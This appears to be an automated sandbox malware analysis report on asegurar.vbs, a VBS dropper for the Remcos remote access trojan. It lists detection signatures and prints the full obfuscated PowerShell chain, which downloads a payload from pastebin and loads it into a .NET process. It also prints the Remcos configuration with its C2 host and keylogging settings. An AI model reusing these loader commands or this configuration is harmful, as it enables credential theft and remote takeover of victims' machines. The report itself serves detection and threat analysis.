

Windows Analysis Report
asegurar.vbs

Overview

General Information

Sample name: asegurar.vbs
Analysis ID: 1545852
MD5: aee210142f6411df0f3c0469d2a9df27
SHA1: 991b0e994e4da9f76bf9fd03bc3fef75dfd94590
SHA256: 3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
Tags: vbs, user-lontze7

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?H
E?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 2476 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 5480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(22 entries in total; 5 shown)
Source | Rule | Description | Author
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
8.2.AddInProcess32.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
(24 entries in total; 5 shown)

                    System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the encoded $IuJUJJZz command line shown for PID 3548 in the process tree above (CommandLine: same).
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the pastebin download command line shown for PID 980 in the process tree above (CommandLine: same); Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: the encoded $IuJUJJZz powershell.exe command line of PID 3548.
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the pastebin download command line shown for PID 980 in the process tree above (CommandLine: same); Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: the encoded $IuJUJJZz powershell.exe command line of PID 3548.
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the pastebin download command line shown for PID 980 in the process tree above (CommandLine: same); Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: the encoded $IuJUJJZz powershell.exe command line of PID 3548.
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the encoded $IuJUJJZz command line shown for PID 3548 in the process tree above (CommandLine: same).
Source: Process started; Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand with the base64 payload shown for PID 5480 in the process tree above, -inputFormat xml -outputFormat text (CommandLine: same); CommandLine|base64offset|contains: jw; Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: the pastebin download powershell.exe command line of PID 980; ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentProcessId: 980; ParentProcessName: powershell.exe; ProcessCommandLine: same as Command; ProcessId: 5480; ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f 
-UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 
'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 